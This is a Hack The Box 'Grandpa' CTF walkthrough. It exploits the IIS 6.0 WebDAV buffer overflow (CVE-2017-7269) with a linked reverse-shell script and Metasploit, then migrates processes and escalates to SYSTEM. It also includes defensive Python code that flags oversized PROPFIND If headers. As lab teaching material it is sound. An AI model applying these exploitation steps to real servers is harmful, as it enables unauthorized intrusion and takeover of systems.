Hack The Box — Grandpa

Grandpa is a Medium-difficulty Windows box on Hack The Box. It is very similar to another box named "Granny" and is also an OSCP-like machine. DO NOTE that this machine cannot be solved easily without Metasploit, so it is suggested to solve it using Metasploit. The machine can also be glitchy at times. At the end, I will cover another way to solve it without Metasploit as well.

ENUMERATION

We find that only port 80 is open, and it is running an outdated IIS server.

We try to find hidden directories and even look at the source code of the default page; however, we are unable to find anything useful and are out of ideas.

Now the only option we have is to run a service exploit. I also know that IIS 6.0 is outdated, as I have faced IIS 10 in other CTFs. So let's google it, and surprisingly all the exploit suggestions we get point to the same vulnerability (CVE-2017-7269).

It is a buffer overflow exploit (avoid using the one on exploit-db). Thankfully we find one on GitHub which is written in Python and has a very simple usage.
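From the defender's side, the CVE-2017-7269 bug is reached through a WebDAV PROPFIND request carrying an abnormally long `If:` header, so a cheap detection is to flag that request shape at a proxy or in a packet capture. The following is an added example, not code from the writeup or the exploit repository; the length threshold and the sample requests are constructed here.

```python
# Added example: flag PROPFIND requests with an oversized If: header, the
# request shape associated with the IIS 6.0 WebDAV overflow (CVE-2017-7269).
from typing import Optional, Tuple, Dict

# Assumed threshold: legitimate If: headers hold short lock tokens or URLs.
MAX_IF_HEADER_LEN = 256

def parse_request(raw: bytes) -> Optional[Tuple[str, str, Dict[str, bytes]]]:
    """Split a raw HTTP request into (method, path, lower-cased header map)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) < 2:
        return None
    method = parts[0].decode(errors="replace")
    path = parts[1].decode(errors="replace")
    headers: Dict[str, bytes] = {}
    for line in lines[1:]:
        if b":" not in line:
            continue
        name, value = line.split(b":", 1)
        headers[name.strip().lower().decode(errors="replace")] = value.strip()
    return method, path, headers

def suspicious_propfind(raw: bytes) -> Optional[str]:
    """Return a reason string if the request matches the heuristic, else None."""
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed request line"
    method, _path, headers = parsed
    if method.upper() != "PROPFIND":
        return None                      # only WebDAV PROPFIND is of interest
    if_hdr = headers.get("if", b"")
    if len(if_hdr) > MAX_IF_HEADER_LEN:
        return f"PROPFIND with oversized If header ({len(if_hdr)} bytes)"
    if any(b > 0x7F for b in if_hdr):
        # Heuristic: a well-formed If: header is plain ASCII (URLs, lock tokens).
        return "PROPFIND If header contains non-ASCII bytes"
    return None

# Constructed sample requests (not captured traffic)
BENIGN = b"PROPFIND /webdav/ HTTP/1.1\r\nHost: server\r\nDepth: 0\r\n\r\n"
LONG_IF = (b"PROPFIND / HTTP/1.1\r\nHost: server\r\n"
           b"If: <http://server/" + b"A" * 500 + b">\r\n\r\n")
```

Run it against proxy logs or a pcap's reassembled requests; PROPFIND should be rare on a server that does not intentionally expose WebDAV, so every hit deserves a look.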

EXPLOIT LINK - https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

Just run the exploit with "python exploit.py" and it will show the usage, which is very simple.

USAGE - python exploit.py RHOST RPORT LHOST LPORT

We got a shell! But it is as Network Service, not SYSTEM, which is the most privileged user.

NOW DO NOTE THAT THE SHELL IS VERY UNSTABLE. I wasted an hour here and wasn't able to download any file using wget, certutil or even PowerShell. If you refer to any other writeup, everyone else faced the same problem as well, and thus we have to use Metasploit in this particular box.

Moving on, I was able to see some interesting things, such as the Users folder not being there; instead there was a folder called Documents and Settings.

I also found that this box is vulnerable to Juicy Potato, as both of the required privileges are enabled. DO NOTE THAT this box can also be solved manually without using Metasploit, as there is a folder called wmpub in the C:\ directory which allows read and write access. Basically this is the only folder where we can read and write. I would highly suggest you refer to this writeup by 0xdf - https://0xdf.gitlab.io/2020/05/28/htb-grandpa.html (if you want to solve it manually).

USING METASPLOIT

We search for the CVE of the same buffer overflow exploit used before and find it immediately.

Now we run the command "show options", set the options accordingly and hit "run".

And boom! We have a shell. (If this fails, try again, as Metasploit can be problematic at times.)

However, when I try to run commands like "whoami" or "getuid", it throws an error. This is because we are currently not running inside a privileged process.

We run the command "ps", which shows all running processes and their PID (process ID).

We migrate to the process wmiprvse.exe, which has the PID 1936, by running the command "migrate 1936", since it is owned by NT AUTHORITY\NETWORK SERVICE and also has the correct architecture (x86). (We can also migrate to w3wp.exe or davcdata.exe if we wish to.)

As we can see above, we can now successfully run the "getuid" command; previously it was throwing an error.

PRIVILEGE ESCALATION

Now, in order to escalate privileges, all we need to do is run the Windows local exploit suggester. But first we have to background our current session by running the command "background".

Make sure to choose your correct session number and hit "run". This will give us a list of possible exploits we can use. DO NOTE THAT we will only use the exploits saying "The target appears to be vulnerable".

Let's go with the second one.

Make sure to set your correct session accordingly and hit "run".

And we got a shell as SYSTEM!

The user and root flags can be found within the "Documents and Settings" folder. Download them using Meterpreter's "download" command.

I hope you learned from this writeup. Make sure you follow me on Medium for more such CTF writeups and cybersecurity articles.

ZEUS


I am a penetration tester, currently pursuing OSCP, skilled in network pentesting and developing hacking tools using Python. I share my knowledge on YouTube.
